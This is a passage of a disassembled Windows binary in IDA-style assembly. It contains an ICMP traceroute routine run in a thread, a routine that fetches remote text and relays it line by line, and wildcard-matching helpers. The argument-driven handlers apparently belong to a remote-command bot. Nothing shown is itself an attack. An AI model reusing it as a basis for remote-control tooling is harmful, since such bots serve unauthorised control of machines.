mov ecx, [ebp+var_4]
mov ecx, [ecx]
mov [eax+4], ecx
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
mov ecx, [ecx+8]
mov [eax+8], ecx
loc_409DA4: ; CODE XREF: sub_409CB1+DA�j
push [ebp+var_1C]
call ds:dword_41E3D4
mov eax, [ebp+var_C]
mov [ebp+var_30], eax
push [ebp+var_30]
call sub_416DCC
pop ecx
mov eax, [ebp+var_10]
mov [ebp+var_34], eax
push [ebp+var_34]
call sub_416DCC
pop ecx
mov eax, [ebp+var_8]
locret_409DCE: ; CODE XREF: sub_409CB1+22�j
leave
retn
sub_409CB1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409DD0 proc near ; DATA XREF: sub_40A1A7+FD�o
var_2F0 = dword ptr -2F0h
var_2EC = dword ptr -2ECh
var_2E8 = dword ptr -2E8h
var_2E4 = dword ptr -2E4h
var_2E0 = dword ptr -2E0h
var_2DC = dword ptr -2DCh
var_2D8 = dword ptr -2D8h
var_2D4 = dword ptr -2D4h
var_2D0 = dword ptr -2D0h
var_2CC = dword ptr -2CCh
var_2C8 = dword ptr -2C8h
var_2C4 = dword ptr -2C4h
var_2C0 = dword ptr -2C0h
var_2BC = dword ptr -2BCh
var_2B8 = dword ptr -2B8h
var_2B4 = dword ptr -2B4h
var_2B0 = byte ptr -2B0h
var_10D = byte ptr -10Dh
var_D = byte ptr -0Dh
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 2F0h
push 2ACh
push [ebp+arg_0]
lea eax, [ebp+var_2B0]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
movzx eax, ds:byte_41E3E0
test eax, eax
jnz short loc_409E6D
push offset aIcmp_dll ; "ICMP.DLL"
call ds:dword_417054 ; LoadLibraryA
mov ds:dword_41E3D0, eax
cmp ds:dword_41E3D0, 0
jnz short loc_409E24
xor eax, eax
jmp locret_40A1A3
; ---------------------------------------------------------------------------
loc_409E24: ; CODE XREF: sub_409DD0+4B�j
push offset aIcmpcreatefile ; "IcmpCreateFile"
push ds:dword_41E3D0
call ds:dword_417058 ; GetProcAddress
mov ds:dword_41E3CC, eax
push offset aIcmpsendecho ; "IcmpSendEcho"
push ds:dword_41E3D0
call ds:dword_417058 ; GetProcAddress
mov ds:dword_41E3D8, eax
push offset aIcmpclosehandl ; "IcmpCloseHandle"
push ds:dword_41E3D0
call ds:dword_417058 ; GetProcAddress
mov ds:dword_41E3D4, eax
mov ds:byte_41E3E0, 1
loc_409E6D: ; CODE XREF: sub_409DD0+32�j
cmp ds:dword_41E3CC, 0
jnz short loc_409E7D
xor eax, eax
jmp locret_40A1A3
; ---------------------------------------------------------------------------
loc_409E7D: ; CODE XREF: sub_409DD0+A4�j
cmp ds:dword_41E3D8, 0
jnz short loc_409E8D
xor eax, eax
jmp locret_40A1A3
; ---------------------------------------------------------------------------
loc_409E8D: ; CODE XREF: sub_409DD0+B4�j
cmp ds:dword_41E3D4, 0
jnz short loc_409E9D
xor eax, eax
jmp locret_40A1A3
; ---------------------------------------------------------------------------
loc_409E9D: ; CODE XREF: sub_409DD0+C4�j
lea eax, [ebp+var_10D]
mov [ebp+var_2B8], eax
push [ebp+var_2B8]
call ds:dword_417244 ; inet_addr
mov [ebp+var_2BC], eax
cmp [ebp+var_2BC], 0FFFFFFFFh
jnz short loc_409F18
push [ebp+var_2B8]
call ds:dword_41723C ; gethostbyname
mov [ebp+var_2C0], eax
cmp [ebp+var_2C0], 0
jz short loc_409F06
mov eax, [ebp+var_2C0]
movsx eax, word ptr [eax+0Ah]
push eax
mov eax, [ebp+var_2C0]
mov eax, [eax+0Ch]
push dword ptr [eax]
lea eax, [ebp+var_2BC]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
jmp short loc_409F18
; ---------------------------------------------------------------------------
loc_409F06: ; CODE XREF: sub_409DD0+10D�j
push offset aCouldNotResolv ; "Could not resolve name"
call sub_416DD8 ; printf
pop ecx
xor eax, eax
jmp locret_40A1A3
; ---------------------------------------------------------------------------
loc_409F18: ; CODE XREF: sub_409DD0+F2�j
; sub_409DD0+134�j
and [ebp+var_4], 0
mov byte ptr [ebp+var_2B4], 1
jmp short loc_409F33
; ---------------------------------------------------------------------------
loc_409F25: ; CODE XREF: sub_409DD0:loc_40A19C�j
mov al, byte ptr [ebp+var_2B4]
add al, 1
mov byte ptr [ebp+var_2B4], al
loc_409F33: ; CODE XREF: sub_409DD0+153�j
movzx eax, byte ptr [ebp+var_2B4]
movzx ecx, [ebp+var_D]
cmp eax, ecx
jg loc_40A1A1
cmp [ebp+var_4], 0
jnz loc_40A1A1
and [ebp+var_2EC], 0
or [ebp+var_2E4], 0FFFFFFFFh
and [ebp+var_2E0], 0
and [ebp+var_2DC], 0
and [ebp+var_2D0], 0
and [ebp+var_2C8], 0
and [ebp+var_2CC], 0
and [ebp+var_2D8], 0
and [ebp+var_2D4], 0
jmp short loc_409F9E
; ---------------------------------------------------------------------------
loc_409F91: ; CODE XREF: sub_409DD0:loc_40A04E�j
mov eax, [ebp+var_2D4]
inc eax
mov [ebp+var_2D4], eax
loc_409F9E: ; CODE XREF: sub_409DD0+1BF�j
mov eax, [ebp+var_2D4]
cmp eax, [ebp+var_8]
jnb loc_40A053
cmp [ebp+var_2D8], 0
jnz loc_40A053
push 20h
push [ebp+var_C]
push [ebp+var_2B4]
lea eax, [ebp+var_2CC]
push eax
push [ebp+var_2BC]
call sub_409CB1
add esp, 14h
test eax, eax
jz short loc_40A047
cmp [ebp+var_2CC], 0
jnz short loc_40A02F
mov eax, [ebp+var_2D0]
add eax, [ebp+var_2C4]
mov [ebp+var_2D0], eax
mov eax, [ebp+var_2C4]
cmp eax, [ebp+var_2E4]
jnb short loc_40A013
mov eax, [ebp+var_2C4]
mov [ebp+var_2E4], eax
loc_40A013: ; CODE XREF: sub_409DD0+235�j
mov eax, [ebp+var_2C4]
cmp eax, [ebp+var_2DC]
jbe short loc_40A02D
mov eax, [ebp+var_2C4]
mov [ebp+var_2DC], eax
loc_40A02D: ; CODE XREF: sub_409DD0+24F�j
jmp short loc_40A045
; ---------------------------------------------------------------------------
loc_40A02F: ; CODE XREF: sub_409DD0+215�j
mov eax, [ebp+var_2CC]
mov [ebp+var_2EC], eax
mov [ebp+var_2D8], 1
loc_40A045: ; CODE XREF: sub_409DD0:loc_40A02D�j
jmp short loc_40A04E
; ---------------------------------------------------------------------------
loc_40A047: ; CODE XREF: sub_409DD0+20C�j
xor eax, eax
jmp locret_40A1A3
; ---------------------------------------------------------------------------
loc_40A04E: ; CODE XREF: sub_409DD0:loc_40A045�j
jmp loc_409F91
; ---------------------------------------------------------------------------
loc_40A053: ; CODE XREF: sub_409DD0+1D7�j
; sub_409DD0+1E4�j
mov eax, [ebp+var_2C8]
mov [ebp+var_2E8], eax
cmp [ebp+var_2EC], 0
jnz short loc_40A07B
mov eax, [ebp+var_2D0]
xor edx, edx
div [ebp+var_8]
mov [ebp+var_2E0], eax
jmp short loc_40A090
; ---------------------------------------------------------------------------
loc_40A07B: ; CODE XREF: sub_409DD0+296�j
and [ebp+var_2E4], 0
and [ebp+var_2E0], 0
and [ebp+var_2DC], 0
loc_40A090: ; CODE XREF: sub_409DD0+2A9�j
cmp [ebp+var_2EC], 0
jnz loc_40A165
push 2
push 4
lea eax, [ebp+var_2E8]
push eax
call ds:dword_417220 ; gethostbyaddr
mov [ebp+var_2F0], eax
cmp [ebp+var_2F0], 0
jz short loc_40A115
movzx eax, byte ptr [ebp+var_2E8+3]
push eax
movzx eax, byte ptr [ebp+var_2E8+2]
push eax
movzx eax, byte ptr [ebp+var_2E8+1]
push eax
movzx eax, byte ptr [ebp+var_2E8]
push eax
mov eax, [ebp+var_2F0]
push dword ptr [eax]
push [ebp+var_2DC]
push [ebp+var_2E0]
push [ebp+var_2E4]
movzx eax, byte ptr [ebp+var_2B4]
push eax
push offset dword_419594
lea eax, [ebp+var_2B0]
push eax
call sub_40D53F
add esp, 2Ch
jmp short loc_40A163
; ---------------------------------------------------------------------------
loc_40A115: ; CODE XREF: sub_409DD0+2EB�j
movzx eax, byte ptr [ebp+var_2E8+3]
push eax
movzx eax, byte ptr [ebp+var_2E8+2]
push eax
movzx eax, byte ptr [ebp+var_2E8+1]
push eax
movzx eax, byte ptr [ebp+var_2E8]
push eax
push [ebp+var_2DC]
push [ebp+var_2E0]
push [ebp+var_2E4]
movzx eax, byte ptr [ebp+var_2B4]
push eax
push offset dword_419568
lea eax, [ebp+var_2B0]
push eax
call sub_40D53F
add esp, 28h
loc_40A163: ; CODE XREF: sub_409DD0+343�j
jmp short loc_40A187
; ---------------------------------------------------------------------------
loc_40A165: ; CODE XREF: sub_409DD0+2C7�j
push [ebp+var_2EC]
movzx eax, byte ptr [ebp+var_2B4]
push eax
push offset dword_419540
lea eax, [ebp+var_2B0]
push eax
call sub_40D53F
add esp, 10h
loc_40A187: ; CODE XREF: sub_409DD0:loc_40A163�j
mov eax, [ebp+var_2BC]
cmp eax, [ebp+var_2E8]
jnz short loc_40A19C
mov [ebp+var_4], 1
loc_40A19C: ; CODE XREF: sub_409DD0+3C3�j
jmp loc_409F25
; ---------------------------------------------------------------------------
loc_40A1A1: ; CODE XREF: sub_409DD0+170�j
; sub_409DD0+17A�j
xor eax, eax
locret_40A1A3: ; CODE XREF: sub_409DD0+4F�j
; sub_409DD0+A8�j ...
leave
retn 4
sub_409DD0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A1A7 proc near ; CODE XREF: sub_40A9CF+FAE�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 18h
cmp [ebp+arg_4], 0
jnz short loc_40A1C7
push offset unk_419618
push [ebp+arg_0]
call sub_40D53F
pop ecx
pop ecx
jmp locret_40A2D0
; ---------------------------------------------------------------------------
loc_40A1C7: ; CODE XREF: sub_40A1A7+A�j
push 2ACh
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_40A1E0
jmp locret_40A2D0
; ---------------------------------------------------------------------------
loc_40A1E0: ; CODE XREF: sub_40A1A7+32�j
push 1A3h
push [ebp+arg_0]
push [ebp+var_4]
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_4]
mov eax, [ebp+var_4]
add eax, 1A3h
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
cmp [ebp+arg_8], 0
jz short loc_40A22A
push [ebp+arg_8]
call sub_416B9C ; atoi
pop ecx
cmp eax, 0FFh
jg short loc_40A22A
push [ebp+arg_8]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_10], eax
jmp short loc_40A231
; ---------------------------------------------------------------------------
loc_40A22A: ; CODE XREF: sub_40A1A7+63�j
; sub_40A1A7+73�j
mov [ebp+var_10], 1Eh
loc_40A231: ; CODE XREF: sub_40A1A7+81�j
mov eax, [ebp+var_4]
mov cl, byte ptr [ebp+var_10]
mov [eax+2A3h], cl
cmp [ebp+arg_C], 0
jz short loc_40A261
push [ebp+arg_C]
call sub_416B9C ; atoi
pop ecx
cmp eax, 927C0h
jg short loc_40A261
push [ebp+arg_C]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_14], eax
jmp short loc_40A268
; ---------------------------------------------------------------------------
loc_40A261: ; CODE XREF: sub_40A1A7+9A�j
; sub_40A1A7+AA�j
mov [ebp+var_14], 7530h
loc_40A268: ; CODE XREF: sub_40A1A7+B8�j
mov eax, [ebp+var_4]
mov ecx, [ebp+var_14]
mov [eax+2A4h], ecx
cmp [ebp+arg_10], 0
jz short loc_40A288
push [ebp+arg_10]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_18], eax
jmp short loc_40A28F
; ---------------------------------------------------------------------------
loc_40A288: ; CODE XREF: sub_40A1A7+D1�j
mov [ebp+var_18], 3
loc_40A28F: ; CODE XREF: sub_40A1A7+DF�j
mov eax, [ebp+var_4]
mov ecx, [ebp+var_18]
mov [eax+2A8h], ecx
lea eax, [ebp+var_C]
push eax
push 0
push [ebp+var_4]
push offset sub_409DD0
push 0
push 0
call ds:dword_4170B4 ; CreateThread
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_40A2C7
push [ebp+var_4]
call sub_416B4C ; free
pop ecx
jmp short locret_40A2D0
; ---------------------------------------------------------------------------
loc_40A2C7: ; CODE XREF: sub_40A1A7+113�j
push [ebp+var_8]
call ds:dword_4170A4 ; CloseHandle
locret_40A2D0: ; CODE XREF: sub_40A1A7+1B�j
; sub_40A1A7+34�j ...
leave
retn
sub_40A1A7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A2D2 proc near ; CODE XREF: sub_40A4A4+30�p
var_111C = dword ptr -111Ch
var_1118 = dword ptr -1118h
var_1114 = byte ptr -1114h
var_114 = byte ptr -114h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 111Ch
call sub_416BC0
mov eax, [ebp+arg_0]
add eax, 4
push eax
mov eax, [ebp+arg_0]
add eax, 104h
push eax
mov eax, [ebp+arg_0]
mov eax, [eax]
push dword ptr [eax]
push offset dword_41966C
mov eax, [ebp+arg_0]
add eax, 204h
push eax
call sub_40D53F
add esp, 14h
push 2710h
push 0
push offset dword_419668
mov eax, [ebp+arg_0]
add eax, 104h
push eax
call sub_4050EA
add esp, 10h
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_40A339
xor al, al
jmp locret_40A4A2
; ---------------------------------------------------------------------------
loc_40A339: ; CODE XREF: sub_40A2D2+5E�j
mov eax, [ebp+arg_0]
add eax, 4
push eax
push offset dword_419660
lea eax, [ebp+var_114]
push eax
call ds:dword_4171E0 ; wsprintfA
add esp, 0Ch
lea eax, [ebp+var_114]
push eax
call sub_416B40 ; strlen
pop ecx
inc eax
push eax
lea eax, [ebp+var_114]
push eax
push [ebp+var_8]
call sub_4053BF
add esp, 0Ch
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_40A38F
push [ebp+var_8]
call sub_40538D
pop ecx
xor al, al
jmp locret_40A4A2
; ---------------------------------------------------------------------------
loc_40A38F: ; CODE XREF: sub_40A2D2+AB�j
push 1000h
lea eax, [ebp+var_1114]
push eax
push [ebp+var_8]
call sub_4053DC
add esp, 0Ch
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jz short loc_40A3B5
cmp [ebp+var_C], 0FFFFFFFFh
jnz short loc_40A3C5
loc_40A3B5: ; CODE XREF: sub_40A2D2+DB�j
push [ebp+var_8]
call sub_40538D
pop ecx
xor al, al
jmp locret_40A4A2
; ---------------------------------------------------------------------------
loc_40A3C5: ; CODE XREF: sub_40A2D2+E1�j
lea eax, [ebp+var_1114]
mov [ebp+var_10], eax
loc_40A3CE: ; CODE XREF: sub_40A2D2:loc_40A492�j
mov eax, [ebp+var_10]
mov [ebp+var_111C], eax
mov eax, [ebp+var_111C]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_40A3E9
jmp loc_40A497
; ---------------------------------------------------------------------------
loc_40A3E9: ; CODE XREF: sub_40A2D2+110�j
push [ebp+var_111C]
call sub_407B5E
pop ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_111C]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_40A41B
push offset dword_418F4C
push [ebp+var_111C]
call sub_416DDE ; strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40A442
loc_40A41B: ; CODE XREF: sub_40A2D2+131�j
mov eax, [ebp+var_111C]
lea ecx, [ebp+var_1114]
cmp eax, ecx
jz short loc_40A440
push offset dword_41965C
mov eax, [ebp+arg_0]
add eax, 204h
push eax
call sub_40D53F
pop ecx
pop ecx
loc_40A440: ; CODE XREF: sub_40A2D2+157�j
jmp short loc_40A458
; ---------------------------------------------------------------------------
loc_40A442: ; CODE XREF: sub_40A2D2+147�j
push [ebp+var_111C]
mov eax, [ebp+arg_0]
add eax, 204h
push eax
call sub_40D53F
pop ecx
pop ecx
loc_40A458: ; CODE XREF: sub_40A2D2:loc_40A440�j
push 3E8h
call ds:dword_41709C ; Sleep
push offset dword_41E3A8
call sub_409C6C
pop ecx
mov eax, [ebp+arg_0]
mov eax, [eax]
mov eax, [eax+4]
mov [ebp+var_1118], eax
push offset dword_41E3A8
call sub_409C7A
pop ecx
cmp [ebp+var_1118], 0
jz short loc_40A492
jmp short loc_40A497
; ---------------------------------------------------------------------------
loc_40A492: ; CODE XREF: sub_40A2D2+1BC�j
jmp loc_40A3CE
; ---------------------------------------------------------------------------
loc_40A497: ; CODE XREF: sub_40A2D2+112�j
; sub_40A2D2+1BE�j
push [ebp+var_8]
call sub_40538D
pop ecx
mov al, 1
locret_40A4A2: ; CODE XREF: sub_40A2D2+62�j
; sub_40A2D2+B8�j ...
leave
retn
sub_40A2D2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A4A4 proc near ; DATA XREF: sub_40A50E+A1�o
var_3A8 = dword ptr -3A8h
var_2A4 = byte ptr -2A4h
var_1A4 = byte ptr -1A4h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 3A8h
push 3A7h
push [ebp+arg_0]
lea eax, [ebp+var_3A8]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
lea eax, [ebp+var_3A8]
push eax
call sub_40A2D2
pop ecx
movzx eax, al
test eax, eax
jnz short loc_40A4FC
lea eax, [ebp+var_2A4]
push eax
push offset dword_419698
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
loc_40A4FC: ; CODE XREF: sub_40A4A4+3B�j
push [ebp+var_3A8]
call sub_409763
pop ecx
xor eax, eax
leave
retn 4
sub_40A4A4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A50E proc near ; CODE XREF: sub_40A9CF+FE3�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_4], 0
jnz short loc_40A51D
jmp locret_40A5BC
; ---------------------------------------------------------------------------
loc_40A51D: ; CODE XREF: sub_40A50E+8�j
push 3A7h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_40A536
jmp locret_40A5BC
; ---------------------------------------------------------------------------
loc_40A536: ; CODE XREF: sub_40A50E+21�j
push [ebp+arg_4]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
cmp [ebp+arg_8], 0
jz short loc_40A562
push [ebp+arg_8]
mov eax, [ebp+var_4]
add eax, 104h
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
jmp short loc_40A586
; ---------------------------------------------------------------------------
loc_40A562: ; CODE XREF: sub_40A50E+3D�j
push offset dword_4196D4
mov eax, [ebp+var_4]
add eax, 104h
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
mov eax, [ebp+var_4]
add eax, 104h
push eax
call sub_4105FB
pop ecx
loc_40A586: ; CODE XREF: sub_40A50E+52�j
push 1A3h
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 204h
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_4]
push [ebp+arg_8]
push offset dword_4196B4
push 0
push [ebp+var_4]
push offset sub_40A4A4
call sub_4095A4
add esp, 18h
locret_40A5BC: ; CODE XREF: sub_40A50E+A�j
; sub_40A50E+23�j
leave
retn
sub_40A50E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A5BE proc near ; CODE XREF: sub_40A5BE+32�p
; sub_40A5BE+70�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_40A603
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_40A5DD
mov al, 1
jmp locret_40A6E9
; ---------------------------------------------------------------------------
loc_40A5DD: ; CODE XREF: sub_40A5BE+16�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 2Ah
jnz short loc_40A5FC
mov eax, [ebp+arg_4]
inc eax
push eax
push [ebp+arg_0]
call sub_40A5BE
pop ecx
pop ecx
jmp locret_40A6E9
; ---------------------------------------------------------------------------
loc_40A5FC: ; CODE XREF: sub_40A5BE+28�j
xor al, al
jmp locret_40A6E9
; ---------------------------------------------------------------------------
loc_40A603: ; CODE XREF: sub_40A5BE+C�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_40A614
xor al, al
jmp locret_40A6E9
; ---------------------------------------------------------------------------
loc_40A614: ; CODE XREF: sub_40A5BE+4D�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
mov ecx, [ebp+arg_4]
movsx ecx, byte ptr [ecx]
cmp eax, ecx
jnz short loc_40A63A
mov eax, [ebp+arg_4]
inc eax
push eax
mov eax, [ebp+arg_0]
inc eax
push eax
call sub_40A5BE
pop ecx
pop ecx
jmp locret_40A6E9
; ---------------------------------------------------------------------------
loc_40A63A: ; CODE XREF: sub_40A5BE+64�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 3Fh
jnz short loc_40A65B
mov eax, [ebp+arg_4]
inc eax
push eax
mov eax, [ebp+arg_0]
inc eax
push eax
call sub_40A5BE
pop ecx
pop ecx
jmp locret_40A6E9
; ---------------------------------------------------------------------------
loc_40A65B: ; CODE XREF: sub_40A5BE+85�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 23h
jnz short loc_40A69E
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 30h
jl short loc_40A67C
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 39h
jle short loc_40A687
loc_40A67C: ; CODE XREF: sub_40A5BE+B1�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 23h
jnz short loc_40A69A
loc_40A687: ; CODE XREF: sub_40A5BE+BC�j
mov eax, [ebp+arg_4]
inc eax
push eax
mov eax, [ebp+arg_0]
inc eax
push eax
call sub_40A5BE
pop ecx
pop ecx
jmp short locret_40A6E9
; ---------------------------------------------------------------------------
loc_40A69A: ; CODE XREF: sub_40A5BE+C7�j
xor al, al
jmp short locret_40A6E9
; ---------------------------------------------------------------------------
loc_40A69E: ; CODE XREF: sub_40A5BE+A6�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 2Ah
jnz short loc_40A6E7
and [ebp+var_4], 0
jmp short loc_40A6B6
; ---------------------------------------------------------------------------
loc_40A6AF: ; CODE XREF: sub_40A5BE:loc_40A6E5�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_40A6B6: ; CODE XREF: sub_40A5BE+EF�j
mov eax, [ebp+arg_4]
inc eax
push eax
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
push eax
call sub_40A5BE
pop ecx
pop ecx
movzx eax, al
test eax, eax
jz short loc_40A6D4
mov al, 1
jmp short locret_40A6E9
; ---------------------------------------------------------------------------
loc_40A6D4: ; CODE XREF: sub_40A5BE+110�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_40A6E5
xor al, al
jmp short locret_40A6E9
; ---------------------------------------------------------------------------
loc_40A6E5: ; CODE XREF: sub_40A5BE+121�j
jmp short loc_40A6AF
; ---------------------------------------------------------------------------
loc_40A6E7: ; CODE XREF: sub_40A5BE+E9�j
xor al, al
locret_40A6E9: ; CODE XREF: sub_40A5BE+1A�j
; sub_40A5BE+39�j ...
leave
retn
sub_40A5BE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A6EB proc near ; CODE XREF: sub_4097A7+10A�p
; sub_4098F3+155�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_40A730
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_40A70A
mov al, 1
jmp locret_40A86B
; ---------------------------------------------------------------------------
loc_40A70A: ; CODE XREF: sub_40A6EB+16�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 2Ah
jnz short loc_40A729
mov eax, [ebp+arg_4]
inc eax
push eax
push [ebp+arg_0]
call sub_40A6EB
pop ecx
pop ecx
jmp locret_40A86B
; ---------------------------------------------------------------------------
loc_40A729: ; CODE XREF: sub_40A6EB+28�j
xor al, al
jmp locret_40A86B
; ---------------------------------------------------------------------------
loc_40A730: ; CODE XREF: sub_40A6EB+C�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_40A741
xor al, al
jmp locret_40A86B
; ---------------------------------------------------------------------------
loc_40A741: ; CODE XREF: sub_40A6EB+4D�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
mov ecx, [ebp+arg_4]
movsx ecx, byte ptr [ecx]
cmp eax, ecx
jnz short loc_40A767
mov eax, [ebp+arg_4]
inc eax
push eax
mov eax, [ebp+arg_0]
inc eax
push eax
call sub_40A6EB
pop ecx
pop ecx
jmp locret_40A86B
; ---------------------------------------------------------------------------
loc_40A767: ; CODE XREF: sub_40A6EB+64�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 41h
jl short loc_40A77D
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 5Ah
jle short loc_40A793
loc_40A77D: ; CODE XREF: sub_40A6EB+85�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 61h
jl short loc_40A7BC
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 7Ah
jg short loc_40A7BC
loc_40A793: ; CODE XREF: sub_40A6EB+90�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
xor eax, 20h
mov ecx, [ebp+arg_4]
movsx ecx, byte ptr [ecx]
cmp eax, ecx
jnz short loc_40A7BC
mov eax, [ebp+arg_4]
inc eax
push eax
mov eax, [ebp+arg_0]
inc eax
push eax
call sub_40A6EB
pop ecx
pop ecx
jmp locret_40A86B
; ---------------------------------------------------------------------------
loc_40A7BC: ; CODE XREF: sub_40A6EB+9B�j
; sub_40A6EB+A6�j ...
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 3Fh
jnz short loc_40A7DD
mov eax, [ebp+arg_4]
inc eax
push eax
mov eax, [ebp+arg_0]
inc eax
push eax
call sub_40A6EB
pop ecx
pop ecx
jmp locret_40A86B
; ---------------------------------------------------------------------------
loc_40A7DD: ; CODE XREF: sub_40A6EB+DA�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 23h
jnz short loc_40A820
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 30h
jl short loc_40A7FE
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 39h
jle short loc_40A809
loc_40A7FE: ; CODE XREF: sub_40A6EB+106�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 23h
jnz short loc_40A81C
loc_40A809: ; CODE XREF: sub_40A6EB+111�j
mov eax, [ebp+arg_4]
inc eax
push eax
mov eax, [ebp+arg_0]
inc eax
push eax
call sub_40A6EB
pop ecx
pop ecx
jmp short locret_40A86B
; ---------------------------------------------------------------------------
loc_40A81C: ; CODE XREF: sub_40A6EB+11C�j
xor al, al
jmp short locret_40A86B
; ---------------------------------------------------------------------------
loc_40A820: ; CODE XREF: sub_40A6EB+FB�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 2Ah
jnz short loc_40A869
and [ebp+var_4], 0
jmp short loc_40A838
; ---------------------------------------------------------------------------
loc_40A831: ; CODE XREF: sub_40A6EB:loc_40A867�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_40A838: ; CODE XREF: sub_40A6EB+144�j
mov eax, [ebp+arg_4]
inc eax
push eax
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
push eax
call sub_40A6EB
pop ecx
pop ecx
movzx eax, al
test eax, eax
jz short loc_40A856
mov al, 1
jmp short locret_40A86B
; ---------------------------------------------------------------------------
loc_40A856: ; CODE XREF: sub_40A6EB+165�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_40A867
xor al, al
jmp short locret_40A86B
; ---------------------------------------------------------------------------
loc_40A867: ; CODE XREF: sub_40A6EB+176�j
jmp short loc_40A831
; ---------------------------------------------------------------------------
loc_40A869: ; CODE XREF: sub_40A6EB+13E�j
xor al, al
locret_40A86B: ; CODE XREF: sub_40A6EB+1A�j
; sub_40A6EB+39�j ...
leave
retn
sub_40A6EB endp
